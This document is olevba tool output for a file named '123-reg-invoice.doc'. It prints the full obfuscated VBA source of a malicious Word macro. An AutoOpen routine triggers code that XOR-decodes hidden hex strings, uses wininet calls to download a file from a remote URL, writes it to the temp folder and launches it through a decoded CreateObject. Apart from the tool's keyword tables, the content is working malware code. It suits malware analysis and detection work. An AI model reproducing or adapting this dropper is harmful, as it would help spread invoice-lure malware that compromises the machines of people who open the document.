Malicious Word macro

1. olevba 0.26 - http://decalage.info/python/oletools
2. Flags       Filename                                                        
3. ----------- -----------------------------------------------------------------
4. OLE:MASIHB- 123-reg-invoice.doc
5.  
6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
7.  
8. ===============================================================================
9. FILE: 123-reg-invoice.doc
10. Type: OLE
11. -------------------------------------------------------------------------------
12. VBA MACRO ThisDocument.cls
13. in file: 123-reg-invoice.doc - OLE stream: u'Macros/VBA/ThisDocument'
14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
15.  
16. Sub ALVERTA(ALVINA As Integer)
17. ALYCE
18. End Sub
19.  
20. Sub autoopen()
21. ALVERTA (703)
22. End Sub
23. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
24. ANALYSIS:
25. +----------+----------+---------------------------------------+
26. | Type     | Keyword  | Description                           |
27. +----------+----------+---------------------------------------+
28. | AutoExec | AutoOpen | Runs when the Word document is opened |
29. +----------+----------+---------------------------------------+
30. -------------------------------------------------------------------------------
31. VBA MACRO MOHAMMAD.bas
32. in file: 123-reg-invoice.doc - OLE stream: u'Macros/VBA/MOHAMMAD'
33. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
34.  
35.  
36.  
37.  
38. #If VBA7 And Win64 Then
39. #Else
40. Public Declare Function Ae3eLAYw3N4A Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef ALE2JANeDR2NA As Long) As Long
41. Public Declare Function AN3DR1EE2 Lib "wininet.dll" Alias "InternetOpenA" (ByVal ALd2PH3OdN3SO As String, ByVal ALE13Xeq1AN13DR13IA As Long, ByVal ALeeqqEqXIdA As String, ByVal ALEg322f223XIS As String, ByVal A32gLF44wvEDA As Long) As Long
42. #End If
43. Public Function ALANNA(ALISHA As Long, ByVal ALISHIA As String) As Boolean
44.    
45.     Dim ALYCIA As Long
46.     Dim Allo5LFRoolE64DIA As String * ALESSANDRA, ALd2PH3OdN3SO As String
47.     Dim ALISSA As Integer, ALISON As Double
48.    
49.     #If VBA7 _
50.     And Win64 Then
51.         Dim ALYSE As LongPtr
52.         Dim ALYSHA As LongPtr
53.     #Else
54.         Dim ALYSHA As Long
55.         Dim ALYSE As Long
56.     #End If
57.     ALYSE = ANASTACIA
58.     If ALYSE = 0 Then
59.         Exit Function
60.     End If
61.     Dim ALYSA As Boolean
62.    
63.     If AMELIA(ALYSHA, ALYSE) Then
64.     End If
65.     If ALYSHA = 0 Then
66.         ALISON = 0
67.     Else
68.         AL3ES2H1A2 ALYSHA, Allo5LFRoolE64DIA, ALESSANDRA, ALYCIA
69.         ALd2PH3OdN3SO = Allo5LFRoolE64DIA
70.           Dim ALITA As Long
71.           ALITA = 22
72.           ALITA = 4 * ALITA - 22
73. If ALITA > ALITA + 44 Then End
74.         Do While ALYCIA <> 0
75.             AL3ES2H1A2 ALYSHA, Allo5LFRoolE64DIA, ALESSANDRA, ALYCIA
76.                     ALd2PH3OdN3SO = ALd2PH3OdN3SO + Mid(Allo5LFRoolE64DIA, 1, ALYCIA)
77.         Loop
78.              ALISON = ALECIA(ALd2PH3OdN3SO): _
79.              ALISSA = ADELINA("JOSEF")
80.         Open ALISHIA _
81.             For Binary _
82.         Lock Write As #ALISSA
83.         Put #ALISSA, , ALd2PH3OdN3SO
84.         ALITA = ALITA + 87
85.     If ALITA < 0 Then End
86.         Close #ALISSA
87.     End If
88.     Ae3eLAYw3N4A ALYSHA
89.     Ae3eLAYw3N4A ALYSE
90.     ALd2PH3OdN3SO = ""
91.     If ALISON Then
92.         ALANNA = True
93.     End If
94. End Function
95.  
96.  
97. Public Function ALENA(ByRef AMBERLY As Object) As Object
98. Set ALENA = AMBERLY.GetSpecialFolder(2)
99. End Function
100.  
101. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
102. ANALYSIS:
103. +------------+-------------+-----------------------------------------+
104. | Type       | Keyword     | Description                             |
105. +------------+-------------+-----------------------------------------+
106. | Suspicious | Open        | May open a file                         |
107. | Suspicious | Lib         | May run code from a DLL                 |
108. | Suspicious | Binary      | May read or write a binary file (if     |
109. |            |             | combined with Open)                     |
110. | Suspicious | Write       | May write to a file (if combined with   |
111. |            |             | Open)                                   |
112. | Suspicious | Put         | May write to a file (if combined with   |
113. |            |             | Open)                                   |
114. | IOC        | wininet.dll | Executable file name                    |
115. +------------+-------------+-----------------------------------------+
116. -------------------------------------------------------------------------------
117. VBA MACRO MILLARD.bas
118. in file: 123-reg-invoice.doc - OLE stream: u'Macros/VBA/MILLARD'
119. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
120.  
121. Public Const AARON = "193B33233B78033F272E2634283C2B2721"
122. Public Const ABBEY = "163A3E22363F2E7B79736167672D3A2D"
123. Public Const ABBIE = "2227223F6D796D2938313B323B212C2F222C5A5D46222F20782C383B6D7B647060607E6627302A"
124. Public Const ABIALITA = "1930242627222B21306C093E252D11313C3D525F7B292036353B"
125. Public Const ADALINE = "KJSVOWVBOWBOWIHBHOI724"
126. #If VBA7 And Win64 Then
127. Public Declare PtrSafe Function AL3ES2H1A2 Lib "wininet.dll" Alias "InternetReadFile" (ByVal Aeu555LuESeIA As LongPtr, ByVal Allo5LFRoolE64DIA As String, ByVal AwefLIC24t24vrA As Long, A4Lgerg3CI11A As Long) As Integer
128. #End If
129. Public Function AGUEDA(AMANDA As Double)
130.  
131.  
132.  
133.  
134. Dim AFTON As Object
135.  
136.  
137.     Dim AIDA As Long
138. For AIDA = 43 To 47
139. AIDA = AIDA + 22
140. Next AIDA
141.    
142.  
143. Dim WESTON  As Object
144.  
145.  
146. For AIDA = 21 To 76
147. AIDA = AIDA + 73
148. Next AIDA
149.    
150.  
151. Set WESTON = ANABEL
152. AIDA = AIDA + 345
153. Dim LEWIS As Boolean
154.  
155. If AIDA > AIDA * 4 Then End
156. LEWIS = AISHA(AFTON, WESTON)
157. AMANDA = AMANDA + 33
158. End Function
159.  
160.  
161. Public Function ALECIA(ADELLA As String) As Long
162. ALECIA = Len(ADELLA)
163. End Function
164.  
165.  
166.  
167. Public Function ALBERT(ByRef AKIKO As Object, ByRef ALPHONSE As String, ALLEGRA As Double) As Boolean
168.  
169. Set ALLENA = CreateObject(ALMEDA _
170. (ADALINE, AARON))
171. Dim DUSTY As Integer
172. DUSTY = ALLENA.Open(AKIKO & ALPHONSE)
173. End Function
174.  
175.  
176.  
177. Public Function ALMEDA(ALMETA As String, ALONA As String) As String
178.    
179.     Dim ALPHA As Integer
180.     Dim ALTAGRACIA As Integer
181.    
182.    
183.     Dim ALTHEA As Long
184.  ALTHEA = 308
185. If ALTHEA > ALTHEA * 10 Then End
186.    
187.     Dim ALEJANDRA As Long
188.     Dim ALVERA As String
189.     For ALEJANDRA = 1 To (ALECIA(ALONA) / 2)
190.         ALPHA = ALEIDA(ALONA, ALEJANDRA)
191.         ALTAGRACIA = ADRIAN(ALMETA, ALEJANDRA)
192.         ALVERA = ALVERA + ALBERTHA(ALPHA, ALTAGRACIA)
193.     Next ALEJANDRA
194.    ALMEDA = ALVERA
195. End Function
196.  
197. Public Function ADRIAN(ByRef ALMETA As String, ByRef ALEJANDRA As Long) As Integer
198. ADRIAN = Asc(ALEXA(48, ALMETA, ((ALEJANDRA Mod ALECIA(ALMETA)) + 1), 1))
199. End Function
200.  
201.  
202.  
203. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
204. ANALYSIS:
205. +------------+----------------+-----------------------------------------+
206. | Type       | Keyword        | Description                             |
207. +------------+----------------+-----------------------------------------+
208. | Suspicious | Open           | May open a file                         |
209. | Suspicious | CreateObject   | May create an OLE object                |
210. | Suspicious | Lib            | May run code from a DLL                 |
211. | Suspicious | Hex Strings    | Hex-encoded strings were detected, may  |
212. |            |                | be used to obfuscate strings (option    |
213. |            |                | --decode to see all)                    |
214. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
215. |            |                | may be used to obfuscate strings        |
216. |            |                | (option --decode to see all)            |
217. | IOC        | wininet.dll    | Executable file name                    |
218. +------------+----------------+-----------------------------------------+
219. -------------------------------------------------------------------------------
220. VBA MACRO MARIANO.bas
221. in file: 123-reg-invoice.doc - OLE stream: u'Macros/VBA/MARIANO'
222. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
223.  
224. #If VBA7 And Win64 Then
225. Public Declare PtrSafe Function Ae3eLAYw3N4A Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef ALE2JANeDR2NA As LongPtr) As Long
226. #End If
227.  
228.  
229. Public Function AILEEN(ANAMARIA As String)
230. Dim AILENE As String
231. AILENE = "ANAMARIA"
232. AGUEDA 221 + 3.22
233. AILENE = AILENE + "AIMEE"
234. End Function
235.  
236.  
237.  
238.  
239. Public Function ALEIDA(ByRef ALONA As String, ByRef ALEJANDRA As Long) As Double
240.  ALEIDA = ANIBAL("&H" & (ALEXA(78, ALONA, ALYSSA(ALEJANDRA), 2)))
241. End Function
242.  
243. Public Function ALEXA(ALEXANDRA As Long, ByRef ADELLA As String, ByRef ALPHA As Integer, ByRef ALTAGRACIA As Integer) As String
244.     ALEXA = Mid$(ADELLA, ALPHA, ALTAGRACIA)
245.     ALEXANDRA = ALEXANDRA + 23
246. End Function
247.  
248.  
249.  
250.  
251. Public Function ALYSSA(ByRef ALEJANDRA As Long) As Long
252.  ALYSSA = (2 * ALEJANDRA) - 1
253. End Function
254.  
255.  
256. Sub AGUSTINA(ANALISA As Double)
257.  
258. AILEEN ("ANALISA")
259. End Sub
260. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
261. ANALYSIS:
262. +------------+----------------+-----------------------------------------+
263. | Type       | Keyword        | Description                             |
264. +------------+----------------+-----------------------------------------+
265. | Suspicious | Lib            | May run code from a DLL                 |
266. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
267. |            |                | may be used to obfuscate strings        |
268. |            |                | (option --decode to see all)            |
269. | IOC        | wininet.dll    | Executable file name                    |
270. +------------+----------------+-----------------------------------------+
271. -------------------------------------------------------------------------------
272. VBA MACRO MARY.bas
273. in file: 123-reg-invoice.doc - OLE stream: u'Macros/VBA/MARY'
274. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
275.  
276.  
277.  
278. Public Function ANIBAL(FRANCES As String) As Double
279. Dim DILLON As Double
280. For DILLON = 26 To 29
281. DILLON = DILLON * 6.127
282. Next DILLON
283. DILLON = Val(FRANCES)
284. ANIBAL = DILLON
285. End Function
286.  
287. Public Function AISHA(ByRef AKIKO As Object, ByRef AKILAH As Object) As Boolean
288.  
289. Dim AL2AIN2A As Integer
290. Set AKIKO = ALENA(ANABEL)
291.  
292. Dim ADOLFO
293.  
294. Dim ALPHONSE As String
295. ALPHONSE = AFTON(3001, ADALINE, ABBEY)
296.  
297. For AL2AIN2A = 21 To 34
298. AL2AIN2A = AL2AIN2A * 12
299. Next AL2AIN2A
300. ADOLFO = AKIKO & ALPHONSE
301.  
302. If ALANNA(52, ADOLFO) Then
303. End If
304.  
305.  
306. AISHA = ALBERT(AKIKO, ALPHONSE, 966)
307.  
308. End Function
309.  
310. Public Function ALBERTHA(ByRef ALPHA As Integer, ByRef ALTAGRACIA As Integer) As String
311.     Dim ALISA As Long
312.     ALISA = ALPHA Xor ALTAGRACIA
313.     ALBERTHA = Chr$(ALISA)
314. End Function
315.  
316.  
317.  
318. #If VBA7 _
319.     And Win64 Then
320. Public Function ANASTACIA() As LongPtr
321.  #Else
322. Public Function ANASTACIA() As Long
323.  
324.  #End If
325.  
326.  ANASTACIA = AN3DR1EE2 _
327.  (ANDERA, _
328.  ANDRE, vbNullString, vbNullString, 0)
329. End Function
330.  
331. Public Function ANABEL() As Object
332. Dim AMPARO As String
333. AMPARO = ALMEDA(ADALINE, ABIALITA)
334. Set ANABEL = CreateObject(AMPARO)
335. End Function
336.  
337.  
338.  
339.  
340.  
341. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
342. ANALYSIS:
343. +------------+--------------+-----------------------------------------+
344. | Type       | Keyword      | Description                             |
345. +------------+--------------+-----------------------------------------+
346. | Suspicious | Chr          | May attempt to obfuscate specific       |
347. |            |              | strings                                 |
348. | Suspicious | Xor          | May attempt to obfuscate specific       |
349. |            |              | strings                                 |
350. | Suspicious | CreateObject | May create an OLE object                |
351. +------------+--------------+-----------------------------------------+
352. -------------------------------------------------------------------------------
353. VBA MACRO MONROE.bas
354. in file: 123-reg-invoice.doc - OLE stream: u'Macros/VBA/MONROE'
355. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
356.  
357.  
358. #If VBA7 And Win64 Then
359. Public Declare PtrSafe Function AN3DR1EE2 Lib "wininet.dll" Alias "InternetOpenA" (ByVal ALd2PH3OdN3SO As String, ByVal ALE13Xeq1AN13DR13IA As Long, ByVal ALeeqqEqXIdA As String, ByVal ALEg322f223XIS As String, ByVal A32gLF44wvEDA As Long) As LongPtr
360. #End If
361.  
362.  
363. Public Const JASPER = "RUSSEL"
364.  
365.  
366. Public Const ALESSANDRA = 4000
367. Public Const ANDERA As String = "ALETHEA"
368. Public Const ANDRE = 1
369. Public Const ALETHIA = &H4000000
370.  
371.  
372.  
373.  
374.  
375. #If VBA7 And Win64 Then
376.        Public Function AMELIA(ByRef AMIEE As LongPtr, AMINA As LongPtr) As Boolean
377.     #Else
378.        Public Function AMELIA(ByRef AMIEE As Long, AMINA As Long) As Boolean
379.     #End If
380.         Dim AM425Ewr24tRI52CA As Long
381. Dim AMIRA As String
382. Dim AMMIE As Long
383.     AMIRA = AFTON(301, ADALINE, ABBIE)
384.  
385. For AM425Ewr24tRI52CA = 55 To 33
386. AM425Ewr24tRI52CA = AM425Ewr24tRI52CA + 900
387. Next AM425Ewr24tRI52CA
388.     AMIEE = AL3ES1HI5A(AMINA, AMIRA, vbNullString, 0, ALETHIA, 0)
389.     AMELIA = True
390. End Function
391.  
392.  
393. Public Function AFTON(AGATHA As Long, HILARIO As String, ENRIQUE As String) As String
394. AGATHA = AGATHA * 3
395. AFTON = ALMEDA(HILARIO, ENRIQUE)
396.    
397. End Function
398.  
399. Public Function ADELINA(ADELLA As String) As Integer
400.     ADELINA = FreeFile
401. End Function
402.  
403.  
404. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
405. ANALYSIS:
406. +------------+-------------+-------------------------+
407. | Type       | Keyword     | Description             |
408. +------------+-------------+-------------------------+
409. | Suspicious | Lib         | May run code from a DLL |
410. | IOC        | wininet.dll | Executable file name    |
411. +------------+-------------+-------------------------+
412. -------------------------------------------------------------------------------
413. VBA MACRO Module1.bas
414. in file: 123-reg-invoice.doc - OLE stream: u'Macros/VBA/Module1'
415. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
416. #If VBA7 And Win64 Then
417. Public Declare PtrSafe Function AL3ES1HI5A Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal MwHAweggqMMegwb3ED As LongPtr, ByVal Seq22A44N6Y As String, ByVal Ae5eLI357357DA As String, ByVal B9RI899990A0N As Long, ByVal H42OU1ST3ON As Long, ByVal LIN3y3CO425uLN As Long) As LongPtr
418. #End If
419.  
420.  
421.  
422. #If VBA7 And Win64 Then
423. #Else
424. Public Declare Function AL3ES2H1A2 Lib "wininet.dll" Alias "InternetReadFile" (ByVal Aeu555LuESeIA As Long, ByVal Allo5LFRoolE64DIA As String, ByVal AwefLIC24t24vrA As Long, A4Lgerg3CI11A As Long) As Integer
425. Public Declare Function AL3ES1HI5A Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal MwHAweggqMMegwb3ED As Long, ByVal Seq22A44N6Y As String, ByVal Ae5eLI357357DA As String, ByVal B9RI899990A0N As Long, ByVal H42OU1ST3ON As Long, ByVal LIN3y3CO425uLN As Long) As Long
426. #End If
427. Public Sub ALYCE()
428.         Dim DEWITT As Double
429.  
430.     Dim AGRIPINA As Double
431. For AGRIPINA = 21 To 25
432. AGRIPINA = AGRIPINA + 22
433. Next AGRIPINA
434.  
435. AGUSTINA (6.33)
436.  
437. End Sub
438.  
439. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
440. ANALYSIS:
441. +------------+----------------+-----------------------------------------+
442. | Type       | Keyword        | Description                             |
443. +------------+----------------+-----------------------------------------+
444. | Suspicious | Lib            | May run code from a DLL                 |
445. | Suspicious | Hex Strings    | Hex-encoded strings were detected, may  |
446. |            |                | be used to obfuscate strings (option    |
447. |            |                | --decode to see all)                    |
448. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
449. |            |                | may be used to obfuscate strings        |
450. |            |                | (option --decode to see all)            |
451. | IOC        | wininet.dll    | Executable file name                    |
452. +------------+----------------+-----------------------------------------+